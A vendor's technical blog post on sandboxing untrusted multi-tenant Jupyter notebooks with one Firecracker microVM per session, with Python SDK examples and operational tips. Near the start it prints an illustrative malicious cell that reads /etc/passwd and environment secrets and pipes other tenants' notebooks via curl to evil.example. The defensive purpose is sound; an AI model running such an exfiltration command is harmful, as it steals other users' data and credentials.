How to Sandbox Untrusted Jupyter Notebooks Per User

Ajay Kumar · 9 min read

If you run a data platform or an education product where students, customers, or random signups write and execute their own Jupyter notebooks, you are operating a remote code execution service. That is not a slur — it is the literal description of the product. Every cell a user runs is arbitrary Python you did not write and cannot review. The only real question is what happens when one of those cells is hostile, broken, or just greedy. The answer depends almost entirely on one decision: how isolated each user's kernel is from everyone else's.

I'm Ajay — I built PandaStack, a Firecracker microVM platform. This post is about the multi-tenant notebook case specifically: why the obvious architecture (one big box, many kernels) quietly hands every user the keys to every other user's data, and why one disposable microVM per notebook session is the model that actually holds up. I'll show the per-session pattern with the Python SDK, and I'll be honest about where the boundaries are.

The shared-kernel trap

The default JupyterHub-style deployment runs many users' kernels as processes on a shared host (or in shared containers). It's easy, it's cheap, and it's a security model held together by hope. A Jupyter kernel is a full Python interpreter with a shell one import away. Nothing about "it's a notebook" constrains what the code can do.

Consider the friendliest-looking cell in the world from one of your users:

import os
# "just checking the environment"
print(os.environ)
# read whatever the host process can read
print(open("/etc/passwd").read())
# and now the part that ruins your week
os.system("cat /home/*/notebooks/* 2>/dev/null | curl -X POST --data-binary @- https://evil.example")

On a shared kernel or a shared container, every line of that has a real chance of working. The environment leaks your database URLs and API keys. The filesystem read walks into other tenants' notebooks because they're all on the same disk. The `os.system` call exfiltrates the lot. And that's the polite attacker. The impolite one spins `while True: pass` in 64 processes (threads would mostly queue behind CPython's GIL), or allocates memory until the OOM killer starts shooting neighbors at random, or fork-bombs the box. None of these are exotic exploits. They're the first things anyone tries, and on a shared kernel they all land.

A Linux container is not a security boundary for untrusted code. Namespaces and cgroups share the host kernel — one kernel vulnerability or container escape, and a malicious notebook reaches the host and every neighbor on it. "We put each user in their own container" is better than nothing and worse than you think.

People reach for patches: drop the Jupyter kernel process's privileges, seccomp-filter its syscalls, set cgroup memory limits, lock down network egress, run gVisor. These help, and you should do the network and resource ones regardless. But they're all hardening on top of a shared host kernel, and the failure mode is the same: the day a kernel CVE drops or your seccomp policy has a gap, the blast radius is every tenant on the machine. You're betting all your users' data on the host kernel never having a bug. The host kernel always eventually has a bug.
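For a sense of what the resource-limit piece of that hardening looks like, here is a minimal sketch using Python's standard `resource` module on Linux. The helper names `run_limited` and `_cap` and the specific limits are my own illustration, not part of any platform API. It caps a child process's address space and CPU time, which stops the memory hog and the busy loop.

```python
import resource
import subprocess
import sys

GIB = 1024 ** 3


def _cap(kind: int, value: int) -> None:
    """Lower the soft and hard limit to `value`, never above the current hard limit."""
    _, hard = resource.getrlimit(kind)
    if hard != resource.RLIM_INFINITY:
        value = min(value, hard)
    resource.setrlimit(kind, (value, value))


def run_limited(source: str, mem_bytes: int = GIB, cpu_seconds: int = 5):
    """Run Python source in a child process with rlimits applied (Linux only)."""

    def apply_limits() -> None:
        # Runs in the child, after fork and before exec.
        _cap(resource.RLIMIT_AS, mem_bytes)
        _cap(resource.RLIMIT_CPU, cpu_seconds)

    return subprocess.run(
        [sys.executable, "-c", source],
        preexec_fn=apply_limits,
        capture_output=True,
        text=True,
        timeout=cpu_seconds + 10,  # wall-clock backstop on top of the CPU limit
    )


# Asks for 2 GiB under a 1 GiB cap: the allocation fails inside the child.
greedy = run_limited("x = bytearray(2 * 1024 ** 3)")
print("greedy exit:", greedy.returncode)

# Busy loop under a 1-second CPU budget: the host kernel signals the child.
busy = run_limited("while True: pass", cpu_seconds=1)
print("busy exit:", busy.returncode)
```

Note what this does not change: the limited child still makes its syscalls against the same host kernel as every other tenant, which is exactly the weakness described above.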

The model that holds: one microVM per notebook session

The architecture that survives contact with real users is one hardware-isolated VM per notebook session. When a user opens their notebook, you create a sandbox. Their kernel runs inside it. When they log out (or go idle, or get reaped), you destroy it. The next session — even for the same user — gets a fresh one.

Each PandaStack sandbox is its own Firecracker microVM with its own guest kernel. Firecracker is the same VMM that AWS Lambda and Fargate use to run untrusted multi-tenant code. The notebook's `os.system`, its `rm -rf /`, its 40GB allocation, its fork bomb: all contained to one throwaway VM with its own memory, its own filesystem, and its own network namespace. There is no shared kernel to attack and no neighbor's disk to read, because the neighbor is a different VM on different (copy-on-write) memory. An escape would have to break the hypervisor itself, a vastly smaller and more heavily audited surface than the full Linux syscall table a container sees.

The historical objection to per-session VMs was startup cost: nobody wants their notebook to take eight seconds to wake up because you're cold-booting a virtual machine. That objection is the part PandaStack is built to kill. Every create restores a baked snapshot on demand instead of cold-booting, so a sandbox comes up in 179ms at p50 (about 49ms of that is the snapshot-restore step itself) and ~203ms at p99. The first-ever spawn of a template is a ~3s cold boot that captures the snapshot; every spawn after that takes the fast path. VM-grade isolation, container-ish latency.
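Latency numbers are worth checking on your own workload rather than taking on faith. Here is a small, SDK-independent sketch of how I'd measure p50 and p99 for any callable. `measure_latency_ms` is a hypothetical helper name, and in real use `action` would wrap a sandbox create followed by a kill, after one warm-up call so the first cold boot of a template doesn't skew the sample.

```python
import statistics
import time
from typing import Callable, Dict, List


def measure_latency_ms(action: Callable[[], object], runs: int = 50) -> Dict[str, float]:
    """Time `action` repeatedly and report p50, p99, and max in milliseconds."""
    samples: List[float] = []
    for _ in range(runs):
        start = time.perf_counter()
        action()
        samples.append((time.perf_counter() - start) * 1000.0)
    # n=100 yields 99 cut points; index 49 is the median, index 98 is p99.
    cuts = statistics.quantiles(samples, n=100, method="inclusive")
    return {"p50": cuts[49], "p99": cuts[98], "max": max(samples)}


# Stand-in workload so the sketch runs anywhere: a 2ms sleep.
stats = measure_latency_ms(lambda: time.sleep(0.002), runs=20)
print({name: round(value, 2) for name, value in stats.items()})
```

With only a few dozen samples the p99 is mostly a restatement of the slowest run, so collect a few hundred creates before reading much into the tail.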

The rule of thumb: the VM is the trust boundary. One session, one VM. Never let two different users' code share a sandbox, and don't recycle a sandbox from user A to user B without destroying it first. Isolation is only as good as how strictly you honor "per session."
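One way to make that rule hard to break by accident is to route every sandbox lookup through a small registry keyed by session. This is a sketch under my own naming (`SessionSandboxes`, `FakeSandbox`), not something the SDK provides. The `create` callable is injected, so in production it would wrap your sandbox create call, and here a fake stands in so the example runs on its own.

```python
from typing import Callable, Dict, Protocol


class Killable(Protocol):
    def kill(self) -> None: ...


class SessionSandboxes:
    """Maps each session id to exactly one sandbox and never reuses it for another."""

    def __init__(self, create: Callable[[str], Killable]) -> None:
        self._create = create
        self._by_session: Dict[str, Killable] = {}

    def get_or_create(self, session_id: str) -> Killable:
        if session_id not in self._by_session:
            self._by_session[session_id] = self._create(session_id)
        return self._by_session[session_id]

    def end(self, session_id: str) -> None:
        """Destroy the sandbox on logout or idle reap; the next login starts fresh."""
        sbx = self._by_session.pop(session_id, None)
        if sbx is not None:
            sbx.kill()


class FakeSandbox:
    """Hypothetical stand-in for a real sandbox handle."""

    def __init__(self, owner: str) -> None:
        self.owner = owner
        self.alive = True

    def kill(self) -> None:
        self.alive = False


registry = SessionSandboxes(create=FakeSandbox)
alice = registry.get_or_create("sess-alice")
bob = registry.get_or_create("sess-bob")
registry.end("sess-alice")
alice_again = registry.get_or_create("sess-alice")
print(alice is bob, alice.alive, alice_again is alice)
```

Because `end` pops the entry before killing it, there is no code path that hands a used sandbox to a later session, even one belonging to the same user.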

The per-session pattern in code

Here's the shape of it with the Python SDK. On login (or on first cell execution) you create a sandbox for that session on the code-interpreter template — which bakes in pandas, numpy, matplotlib, scikit-learn, and a Jupyter/IPython kernel, so there's no per-session pip install. You write the user's cell to a file in the guest, exec it with a timeout, capture output, and read any artifacts (a plot, a CSV) back through the filesystem API. The `ttl_seconds` is a backstop so a session you forget to close reaps itself.

from pandastack import Sandbox

# On login: one sandbox per notebook session. The TTL is a backstop in case
# the user closes the tab without a clean logout (they always do).
session_sbx = Sandbox.create(
    template="code-interpreter",
    ttl_seconds=3600,           # auto-reap after an hour of life
    metadata={"user_id": "u_42", "notebook": "intro-to-pandas"},
)

def run_cell(sbx, cell_source: str, n: int) -> dict:
    """Execute one notebook cell inside the user's own microVM."""
    path = f"/workspace/cell_{n}.py"
    sbx.filesystem.write(path, cell_source)
    # ALWAYS pass a timeout. User code loops more than you'd believe.
    result = sbx.exec(f"python3 {path}", timeout_seconds=30)
    return {
        "exit_code": result.exit_code,
        "stdout": result.stdout,
        "stderr": result.stderr,
    }

# A cell that makes a chart and saves it to /workspace.
cell = '''
import matplotlib
matplotlib.use("Agg")            # headless, no display in the VM
import matplotlib.pyplot as plt
import numpy as np

x = np.linspace(0, 10, 200)
plt.plot(x, np.sin(x))
plt.title("hello from an isolated kernel")
plt.savefig("/workspace/plot.png", dpi=120, bbox_inches="tight")
print("chart written")
'''

out = run_cell(session_sbx, cell, n=1)
print("exit:", out["exit_code"], "|", out["stdout"].strip())

Reading the chart back out is the same pattern any notebook UI needs — the cell writes a known path, you check the exit code, then pull the bytes. Render them inline, or attach them to the notebook output.

# Read the generated artifact back as raw bytes and hand it to your UI.
if out["exit_code"] == 0:
    png_bytes = session_sbx.filesystem.read("/workspace/plot.png")
    with open("plot.png", "wb") as f:
        f.write(png_bytes)
    print(f"pulled {len(png_bytes)} bytes of plot")

# On logout (or idle reap, or the user rage-quitting): destroy the VM.
# This is the whole point — the blast radius leaves with the session.
session_sbx.kill()
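For short-lived jobs, such as running one submitted notebook end to end, it can help to make the kill impossible to forget. Below is a minimal sketch using a context manager. `notebook_session` and `StubSandbox` are names I made up for illustration; with the real SDK you would pass `Sandbox.create` and the same keyword arguments shown earlier.

```python
from contextlib import contextmanager


@contextmanager
def notebook_session(create, **create_kwargs):
    """Create a sandbox, hand it to the caller, and always kill it afterwards."""
    sbx = create(**create_kwargs)
    try:
        yield sbx
    finally:
        sbx.kill()  # runs on normal exit and on exceptions alike


class StubSandbox:
    """Hypothetical stand-in so the sketch runs without the SDK."""

    def __init__(self, **kwargs):
        self.kwargs = kwargs
        self.killed = False

    def kill(self):
        self.killed = True


captured = []
try:
    with notebook_session(StubSandbox, template="code-interpreter", ttl_seconds=3600) as sbx:
        captured.append(sbx)
        raise RuntimeError("cell runner crashed")
except RuntimeError:
    pass

print("killed after crash:", captured[0].killed)
```

The TTL still matters here: `finally` only helps while your own process is alive, and the TTL covers the case where it isn't.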

Within a single session, state persists naturally on disk: the guest filesystem is alive for the life of the sandbox, so a dataframe a user saves to `/workspace` in cell one is right there in cell two. Note that `run_cell` above starts a fresh `python3` process for every cell, so variables held only in memory do not carry over. For true in-memory continuity (live Python objects across cells, exact notebook semantics) keep a persistent Jupyter kernel running inside the sandbox and send each cell to it; the kernel binaries are already baked into the template. What you never do is share that kernel across users.
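The difference between "a process per cell" and "a persistent kernel" is easy to see in plain Python. This sketch uses only the standard library, and `PersistentNamespace` is a deliberately tiny stand-in for a real Jupyter kernel, not how Jupyter is implemented. Either variant is meant to run inside the user's sandbox, never on your host.

```python
import contextlib
import io
import subprocess
import sys


def run_in_fresh_process(source: str) -> subprocess.CompletedProcess:
    """One interpreter per cell: nothing in memory survives to the next call."""
    return subprocess.run(
        [sys.executable, "-c", source], capture_output=True, text=True, timeout=30
    )


class PersistentNamespace:
    """Stand-in for a long-lived kernel: every cell executes in the same namespace."""

    def __init__(self) -> None:
        self._ns = {"__name__": "__main__"}

    def run(self, source: str) -> str:
        buf = io.StringIO()
        with contextlib.redirect_stdout(buf):
            exec(compile(source, "<cell>", "exec"), self._ns)
        return buf.getvalue()


# Fresh process per cell: the second cell cannot see `total`.
run_in_fresh_process("total = 41")
second = run_in_fresh_process("print(total + 1)")
print("fresh process failed:", second.returncode != 0)

# Persistent namespace: the second cell picks up where the first left off.
kernel = PersistentNamespace()
kernel.run("total = 41")
answer = kernel.run("print(total + 1)")
print("persistent namespace says:", answer.strip())
```

A real kernel adds a message protocol, rich outputs, and interrupts on top of this, but the state model is the same: one long-lived namespace per session.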

Shared JupyterHub kernel vs microVM-per-session

  • Isolation boundary — Shared kernel: namespaces + cgroups on one host kernel; an escape or kernel CVE reaches every tenant. microVM-per-session: hardware-virtualized VM with its own guest kernel; an escape has to break the hypervisor.
  • Cross-tenant data — Shared kernel: notebooks and env vars often sit on the same host, one path traversal away. microVM-per-session: each session is a separate VM on copy-on-write memory and its own filesystem — nothing to traverse into.
  • Runaway code (infinite loops, fork bombs, OOM) — Shared kernel: a noisy neighbor degrades or kills everyone on the box. microVM-per-session: capped to one VM's vCPU/RAM; the rest of the fleet never notices.
  • Blast radius of a malicious cell — Shared kernel: potentially the host and all tenants. microVM-per-session: one disposable VM that you destroy on logout anyway.
  • Startup cost — Shared kernel: a kernel spawns in well under a second. microVM-per-session: snapshot-restore create at p50 179ms (~203ms p99), ~3s only on the very first cold boot of a template.
  • Cleanup — Shared kernel: you have to scrub state, temp files, and stray processes between users and pray you got it all. microVM-per-session: kill the VM; state cannot leak because the VM is gone.
  • Operational model — Shared kernel: harden the host forever and own every CVE. microVM-per-session: per-session VMs are cattle; treat the host as untrusted and let the hypervisor do the isolating.

Operational notes from running this for real

A few things worth doing once you commit to per-session VMs:

  • Always set both timeout_seconds on exec and ttl_seconds on create. The exec timeout catches the loop; the TTL catches the session that never logs out. Tabs get closed without warning constantly.
  • Lock down network egress at the network layer, not in the code. The VM contains execution, but if a notebook can reach the internet it can still exfiltrate whatever it computes — restrict outbound access for untrusted tenants.
  • Never inject your platform's secrets into the guest. A sandbox isolates the user's code from your host; it does not protect a database URL you handed straight to that code. Keep credentials out of the VM's environment entirely.
  • Snapshot a configured "golden" notebook environment once and fork it per session if you want every user to start from an identical pre-warmed state — a same-host fork is 400–750ms and shares memory copy-on-write (cross-host is 1.2–3.5s).
  • If users need a real database, give each their own — a managed Postgres VM takes 30–90s to provision and is its own isolated microVM, not a schema on a shared instance.
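The "no platform secrets in the guest" rule is easiest to enforce with an allowlist rather than a blocklist: decide which variables a notebook legitimately needs and drop everything else. Here is a minimal sketch. `guest_env` and the allowed names are assumptions for illustration, and I'm deliberately not showing how the result is passed to the sandbox because that depends on your SDK.

```python
from typing import Dict, Iterable, Mapping

# Hypothetical allowlist: only variables a notebook legitimately needs.
DEFAULT_ALLOWED = frozenset({"LANG", "TZ", "PYTHONUNBUFFERED"})


def guest_env(
    host_env: Mapping[str, str], allowed: Iterable[str] = DEFAULT_ALLOWED
) -> Dict[str, str]:
    """Return only the allowlisted variables; everything else stays on the host."""
    allowed_set = set(allowed)
    return {name: value for name, value in host_env.items() if name in allowed_set}


host = {
    "LANG": "C.UTF-8",
    "TZ": "UTC",
    "DATABASE_URL": "postgres://example-not-real",
    "PAYMENTS_API_KEY": "example-not-a-real-key",
}
safe = guest_env(host)
print(sorted(safe))
```

A blocklist that looks for names like `KEY` or `TOKEN` fails open the day someone adds a secret with an unusual name; an allowlist fails closed.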

Capacity is rarely the constraint people fear: a single agent pre-allocates 16,384 /30 subnets, so the practical ceiling on concurrent sessions is host memory and CPU, not networking. You scale tenants horizontally by adding hosts, and because idle sessions can hibernate (snapshot memory + disk, stop the VM, auto-wake on the next request) a classroom of 200 students who all wandered off to lunch isn't 200 VMs burning RAM.
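The subnet figure is simple arithmetic: 16,384 /30 networks is exactly one /16 of address space, and each /30 carries two usable addresses, enough for a point-to-point link. The sketch below checks that with the standard `ipaddress` module. The `10.200.0.0/16` pool is a made-up example, and reading each /30 as a host-side and guest-side pair is my assumption about how such a subnet would be used.

```python
import ipaddress

# Hypothetical address pool; any /16 gives the same count.
pool = ipaddress.ip_network("10.200.0.0/16")
subnets = list(pool.subnets(new_prefix=30))

print(len(subnets))         # 16384, i.e. 2 ** (30 - 16)
print(pool.num_addresses)   # 65536 addresses in total

first = subnets[0]
usable = [str(host) for host in first.hosts()]
print(first, usable)        # 10.200.0.0/30 ['10.200.0.1', '10.200.0.2']
```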

When a shared kernel is actually fine

To be fair to the simple architecture: if every user of your notebook platform is a trusted employee on the same team, sharing a host is reasonable and a per-session VM is overkill. The trust boundary is the company, not the individual, and you've accepted that risk implicitly anyway. The model breaks the instant "users" means "people who signed up" — students, customers, prospects, the public. The moment you can't vouch for the person writing the code, the kernel they run on has to be theirs alone. That's the entire decision, and per-session microVMs are how you make "theirs alone" cheap enough to actually do.

Frequently asked questions

Why isn't a per-user container enough to sandbox untrusted notebooks?

Containers share the host kernel. A malicious notebook only needs one kernel vulnerability or container-escape bug to reach the host and every other tenant on it, and a busy loop or large allocation can starve neighbors through the shared kernel's scheduler and memory. Hardening (seccomp, dropped privileges, cgroup limits) reduces but never removes that shared-kernel risk. A Firecracker microVM gives each session its own guest kernel, so an escape would have to break the hypervisor itself.

How do I isolate each user's Jupyter kernel?

Create one sandbox per notebook session on the code-interpreter template, run that user's kernel inside it, and destroy the sandbox on logout or idle reap. Each sandbox is its own Firecracker microVM with a separate guest kernel, filesystem, and network namespace, so one user's code cannot read another's notebooks, env vars, or memory. Never share a sandbox across two different users — the VM is the trust boundary.

Won't booting a VM per notebook session be too slow?

Cold-booting a VM would be, which is why PandaStack restores a baked snapshot on every create instead. A sandbox comes up in 179ms at p50 (around 49ms of that is the snapshot-restore step) and ~203ms at p99. Only the very first spawn of a template is a ~3s cold boot that captures the snapshot; every session after that takes the fast path. To start every session from an identical pre-warmed state you can fork a snapshot in 400–750ms on the same host.

How do I stop one notebook from taking down the whole platform?

Run each session in its own microVM with its own vCPU and RAM, so an infinite loop, fork bomb, or memory blowout is capped to that one VM and the rest of the fleet is unaffected. Always set a timeout on each cell execution and a TTL on the sandbox so runaway code and abandoned sessions reap themselves, and restrict network egress at the network layer to limit data exfiltration.

How does state persist between cells if each session is a throwaway VM?

The VM is throwaway per session, not per cell — it stays alive for the whole notebook session. State persists naturally on the guest filesystem and in a long-running kernel for the life of that sandbox, so a dataframe saved in one cell is available in the next. For exact notebook semantics (live Python objects across cells) keep a persistent Jupyter kernel running inside the sandbox; the kernel binaries are baked into the template. The state only disappears when the session ends and you kill the VM.

Written by Ajay Kumar, Founder, PandaStack.